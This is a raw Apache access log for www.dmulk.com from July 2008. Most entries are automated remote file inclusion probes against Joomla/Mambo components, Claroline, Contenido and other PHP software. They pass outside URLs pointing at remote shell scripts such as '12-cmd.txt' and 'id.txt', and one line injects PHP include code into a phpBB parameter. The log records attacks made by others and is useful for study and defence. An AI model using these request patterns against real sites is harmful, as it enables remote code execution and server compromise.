89.111.173.117 - - [24/Jul/2008:06:17:34 -0700] "GET /logs//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.89.194 - - [24/Jul/2008:06:17:37 -0700] "GET /logs//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [24/Jul/2008:06:17:39 -0700] "GET //index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt?? HTTP/1.1" 200 18573 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [24/Jul/2008:06:17:48 -0700] "GET /logs/access_080105.log//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.111.173.117 - - [24/Jul/2008:06:17:52 -0700] "GET /logs/access_080304.log//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.117 - - [24/Jul/2008:06:17:54 -0700] "GET /logs//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.117 - - [24/Jul/2008:06:17:55 -0700] "GET //index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 200 18489 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.89.194 - - [24/Jul/2008:06:17:57 -0700] "GET /logs/access_080513.log/errors.php?error=http://futureikon.com/cache/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [24/Jul/2008:06:18:28 -0700] "GET /logs/access_080304.log//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
58.227.193.211 - - [24/Jul/2008:06:18:52 -0700] "GET /logs/access_080207.log/components/com_simpleboard/image_upload.php?sbp=ftp://212.11.127.86/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [24/Jul/2008:06:18:52 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=ftp://212.11.127.86/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:18:58 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:18:58 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
212.92.130.236 - - [24/Jul/2008:06:19:34 -0700] "GET /logs//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.92.130.236 - - [24/Jul/2008:06:19:36 -0700] "GET //index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 200 18493 "-" "libwww-perl/5.65" "www.dmulk.com"
213.27.149.4 - - [24/Jul/2008:06:19:42 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://home.bellavillapattaya.com/modul/mic.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.27.149.4 - - [24/Jul/2008:06:19:46 -0700] "GET //index.php?option=com_custompages&cpage=http://home.bellavillapattaya.com/modul/mic.txt??? HTTP/1.1" 200 18485 "-" "libwww-perl/5.79" "www.dmulk.com"
212.92.130.236 - - [24/Jul/2008:06:19:59 -0700] "GET /logs//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.27.149.4 - - [24/Jul/2008:06:20:02 -0700] "GET /logs/errors.php?error=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.151.100.50 - - [24/Jul/2008:06:20:02 -0700] "GET /logs/access_071130.log/index.php?seite=http://www.prepaidcard.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.27.149.4 - - [24/Jul/2008:06:20:02 -0700] "GET /errors.php?error=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.92.130.236 - - [24/Jul/2008:06:20:02 -0700] "GET //index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 200 18493 "-" "libwww-perl/5.65" "www.dmulk.com"
83.160.206.90 - - [24/Jul/2008:06:20:04 -0700] "GET /logs//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.160.206.90 - - [24/Jul/2008:06:20:04 -0700] "GET //admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.151.100.50 - - [24/Jul/2008:06:20:05 -0700] "GET /index.php?seite=http://www.prepaidcard.net/id.txt? HTTP/1.1" 200 18385 "-" "libwww-perl/5.805" "www.dmulk.com"
91.151.100.50 - - [24/Jul/2008:06:20:06 -0700] "GET /logs/index.php?seite=http://www.prepaidcard.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.92.130.236 - - [24/Jul/2008:06:20:08 -0700] "GET /logs//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.92.130.236 - - [24/Jul/2008:06:20:09 -0700] "GET //index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 200 18493 "-" "libwww-perl/5.65" "www.dmulk.com"
212.92.130.236 - - [24/Jul/2008:06:20:11 -0700] "GET /logs//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.92.130.236 - - [24/Jul/2008:06:20:13 -0700] "GET //index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 200 18493 "-" "libwww-perl/5.65" "www.dmulk.com"
212.92.130.236 - - [24/Jul/2008:06:20:13 -0700] "GET /logs//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.92.130.236 - - [24/Jul/2008:06:20:14 -0700] "GET /logs//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.92.130.236 - - [24/Jul/2008:06:20:14 -0700] "GET //index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 200 18477 "-" "libwww-perl/5.65" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:20:15 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:20:15 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
212.92.130.236 - - [24/Jul/2008:06:20:15 -0700] "GET //index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 200 18493 "-" "libwww-perl/5.65" "www.dmulk.com"
212.92.130.236 - - [24/Jul/2008:06:20:34 -0700] "GET /logs/access_080105.log//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.92.130.236 - - [24/Jul/2008:06:20:36 -0700] "GET /logs/access_080105.log//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.119.244.16 - - [24/Jul/2008:06:20:37 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.secondlive24.de/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.244.16 - - [24/Jul/2008:06:20:38 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.secondlive24.de/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.52.214.245 - - [24/Jul/2008:06:20:38 -0700] "GET /index.php?pagina=http://61.103.221.190/home/ecolas-dl/core/user/search/configure/LIST_K2UP_LIGHT/22.txt??? HTTP/1.1" 200 18533 "-" "libwww-perl/5.810" "www.dmulk.com"
212.92.130.236 - - [24/Jul/2008:06:20:42 -0700] "GET /logs/access_080105.log//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.221.130.15 - - [24/Jul/2008:06:20:44 -0700] "GET //components/errors.php?error=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.92.130.236 - - [24/Jul/2008:06:20:49 -0700] "GET /logs/access_080105.log//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.92.130.236 - - [24/Jul/2008:06:20:50 -0700] "GET /logs/access_080105.log//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.22.89.194 - - [24/Jul/2008:06:21:00 -0700] "GET /logs/access_080313.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://bchorseclassifieds.com/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [24/Jul/2008:06:21:00 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://bchorseclassifieds.com/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [24/Jul/2008:06:21:00 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://bchorseclassifieds.com/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
65.98.116.103 - - [24/Jul/2008:06:21:13 -0700] "GET /logs/access.log//public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=http://www.elnavegantedigital.es/components/pay/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.98.116.103 - - [24/Jul/2008:06:21:13 -0700] "GET //public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=http://www.elnavegantedigital.es/components/pay/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.98.116.103 - - [24/Jul/2008:06:21:14 -0700] "GET /logs//public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=http://www.elnavegantedigital.es/components/pay/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.92.130.236 - - [24/Jul/2008:06:21:16 -0700] "GET /logs/access_080105.log//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.92.130.236 - - [24/Jul/2008:06:21:24 -0700] "GET /logs/access_080304.log//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.92.130.236 - - [24/Jul/2008:06:21:24 -0700] "GET /logs/access_080304.log//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.92.130.236 - - [24/Jul/2008:06:21:25 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.92.130.236 - - [24/Jul/2008:06:21:25 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.92.130.236 - - [24/Jul/2008:06:21:28 -0700] "GET /logs/access_080304.log//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.92.130.236 - - [24/Jul/2008:06:21:30 -0700] "GET /logs/access_080304.log//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.92.130.236 - - [24/Jul/2008:06:21:33 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.92.130.236 - - [24/Jul/2008:06:21:36 -0700] "GET /logs/access_080304.log//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.98.71 - - [24/Jul/2008:06:21:43 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [24/Jul/2008:06:21:43 -0700] "GET /phphtml.php?htmlclass_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:21:47 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:21:47 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
87.106.191.163 - - [24/Jul/2008:06:21:55 -0700] "GET /logs/phphtml.php?htmlclass_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.163 - - [24/Jul/2008:06:21:55 -0700] "GET /phphtml.php?htmlclass_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.89.194 - - [24/Jul/2008:06:22:01 -0700] "GET /logs/access_080329.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://bchorseclassifieds.com/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
88.84.151.157 - - [24/Jul/2008:06:22:03 -0700] "GET /logs/access_080329.log//claroline/exercice/testheaderpage.php?rootSys=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.92.130.236 - - [24/Jul/2008:06:22:04 -0700] "GET /logs/access_080304.log//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.84.151.157 - - [24/Jul/2008:06:22:09 -0700] "GET /logs/access_080329.log//claroline/tracking/userLog.php?rootSys=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.143.162 - - [24/Jul/2008:06:22:10 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.secondlive24.de/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.143.162 - - [24/Jul/2008:06:22:10 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.secondlive24.de/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
201.218.250.106 - - [24/Jul/2008:06:22:15 -0700] "GET /logs//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.secondlive24.de/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
201.218.250.106 - - [24/Jul/2008:06:22:16 -0700] "GET //index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.secondlive24.de/help/sql.txt? HTTP/1.1" 200 18507 "-" "libwww-perl/5.811" "www.dmulk.com"
83.240.164.232 - - [24/Jul/2008:06:22:41 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.remi2b.net/modules/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.240.164.232 - - [24/Jul/2008:06:22:42 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.remi2b.net/modules/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
91.151.100.50 - - [24/Jul/2008:06:23:07 -0700] "GET /logs/access_080128.log/index.php?seite=http://www.prepaidcard.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:23:13 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:23:13 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
194.85.89.114 - - [24/Jul/2008:06:23:43 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.allfreeipodsex.com/ipod.gif????? HTTP/1.1" 200 3694 "-" "libwww-perl/5.805" "www.dmulk.com"
74.220.215.216 - - [24/Jul/2008:06:24:09 -0700] "GET /logs//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.secondlive24.de/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.220.215.216 - - [24/Jul/2008:06:24:11 -0700] "GET //index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.secondlive24.de/help/sql.txt? HTTP/1.1" 200 18507 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.127 - - [24/Jul/2008:06:24:33 -0700] "GET /errors.php?error=http://www.timeshare-sales-professionals.org/com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:24:40 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:24:40 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
212.92.130.236 - - [24/Jul/2008:06:24:47 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:26:12 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:26:12 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
83.160.206.90 - - [24/Jul/2008:06:26:25 -0700] "GET //index.php?INCLUDE_FOLDER=http://tartufellinolol.altervista.org/piccino/id2.txt? HTTP/1.1" 200 18449 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
83.160.206.90 - - [24/Jul/2008:06:26:25 -0700] "GET /logs//index.php?INCLUDE_FOLDER=http://tartufellinolol.altervista.org/piccino/id2.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
216.246.41.206 - - [24/Jul/2008:06:26:30 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://bolikowski.com/images/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.246.41.206 - - [24/Jul/2008:06:26:30 -0700] "GET //include/admin.lib.inc.php?site_path=http://bolikowski.com/images/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.246.41.206 - - [24/Jul/2008:06:26:30 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://bolikowski.com/images/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.114.135.126 - - [24/Jul/2008:06:26:40 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=ftp://212.11.127.86/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [24/Jul/2008:06:26:40 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [24/Jul/2008:06:26:44 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=ftp://212.11.127.86/tmp/trem/oldbisok?? HTTP/1.1" 200 18513 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [24/Jul/2008:06:26:47 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 200 18475 "-" "libwww-perl/5.805" "www.dmulk.com"
74.220.215.216 - - [24/Jul/2008:06:26:55 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.secondlive24.de/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.220.215.216 - - [24/Jul/2008:06:26:55 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.secondlive24.de/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
189.77.91.153 - - [24/Jul/2008:06:27:17 -0700] "GET /logs/access_080105.log//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.dpfbrasil.net63.net/i.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
189.77.91.153 - - [24/Jul/2008:06:27:19 -0700] "GET //index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.dpfbrasil.net63.net/i.txt? HTTP/1.1" 200 18497 "-" "libwww-perl/5.800" "www.dmulk.com"
189.77.91.153 - - [24/Jul/2008:06:27:21 -0700] "GET /logs//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.dpfbrasil.net63.net/i.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:27:36 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:27:36 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
210.245.166.92 - - [24/Jul/2008:06:27:38 -0700] "GET //config/dbutil.bck.php?confdir=http://www.veneno.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
160.99.12.231 - - [24/Jul/2008:06:27:49 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://genthal.com/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [24/Jul/2008:06:27:52 -0700] "GET //index.php?DOCUMENT_ROOT=http://genthal.com/alba.txt??? HTTP/1.1" 200 18403 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [24/Jul/2008:06:27:53 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://genthal.com/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.18.246 - - [24/Jul/2008:06:27:58 -0700] "GET /bikes/dteel/2008_07_20/?M=D HTTP/1.0" 200 2246 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:28:59 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:28:59 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
189.77.91.153 - - [24/Jul/2008:06:29:24 -0700] "GET /logs/access_080304.log//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.dpfbrasil.net63.net/i.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.218.250.106 - - [24/Jul/2008:06:29:56 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.secondlive24.de/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
201.218.250.106 - - [24/Jul/2008:06:29:56 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.secondlive24.de/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
